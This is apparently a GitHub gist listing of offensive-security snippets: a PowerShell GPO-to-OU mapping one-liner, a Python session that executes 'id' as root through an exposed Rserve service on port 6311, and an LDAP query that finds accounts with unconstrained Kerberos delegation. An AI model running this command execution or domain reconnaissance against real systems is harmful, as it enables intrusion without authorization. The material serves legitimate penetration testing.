Skip to content

Instantly share code, notes, and snippets.

View csandker's full-sized avatar

Carsten Sandker csandker

185 followers · 0 following
View GitHub Profile
@csandker
csandker / MapGPOsToOUs.ps1
Created October 7, 2022 13:07
MapGPOsToOUs.ps1
## Human Readable
$checkGPO = "All"; ## You can also put the displayName of specific GPO here
$optLookup=@{"0"="Not Enforced & Enabled"; "1"="Not Enforced & Not Enabled";"2"="Enforced & Enabled";"3"="Enforced & Not Enabled"};$objMap=@{};$linkMap=@{};Write-Host "# GPO Overview";([ADSISearcher]"(gpLink=*)").FindAll() | %{ $linkedObj = $_;$gpLinks=($_.Properties.gplink[0] -split {$_ -eq '[' -or $_ -eq ']'} | ? {$_}); ForEach($gpLink in $gpLinks){
$dn,$gpLinkOpt = ($gpLink -Split ';');
$gpoObj = ([ADSI]"$dn");
$gpoObjName = $gpoObj.displayName[0];
$gpoNameAndOpt = "$($gpoObjName) ($($optLookup[$gpLinkOpt]))";
if($checkGPO -ne "All" -and $gpoObjName -ne $checkGPO){
Continue
}
@csandker
csandker / CommandExec-RServe-TCP-3611.py
Created August 19, 2020 17:06
Command Exec. In RServe TCP/6311
## Install pyRserve
$:> pip install pyRserve
$:> python3
>>> conn = pyRserve.connect('<IP>', 6311)
>>> conn.eval("1+2") ## Testing the connection
3.0
>>> conn.eval('t1 <- try(system("id", intern = TRUE))') ## Command Exec
'uid=0(root) gid=0(root) groups=0(root)'
>>> con.close()
@csandker
csandker / KerberosDelegation-Checks
Created January 22, 2020 16:17
Kerberos Delegation Checks
PS C:\Users\Clark.Kent\Desktop> ## Unconstrained Delegation
PS C:\Users\Clark.Kent\Desktop> ([adsisearcher]'(userAccountControl:1.2.840.113556.1.4.803:=524288)').FindAll()
Path Properties
---- ----------
LDAP://CN=DC01,OU=Domain Controllers,DC=MonkeyIsland,DC=local {ridsetreferences, logoncount, codepage, objectcategor...
LDAP://CN=HTTPSvc,CN=Users,DC=MonkeyIsland,DC=local {givenname, codepage, objectcategory, dscorepropagatio...
PS C:\Users\Clark.Kent\Desktop> ## Constrained Delegation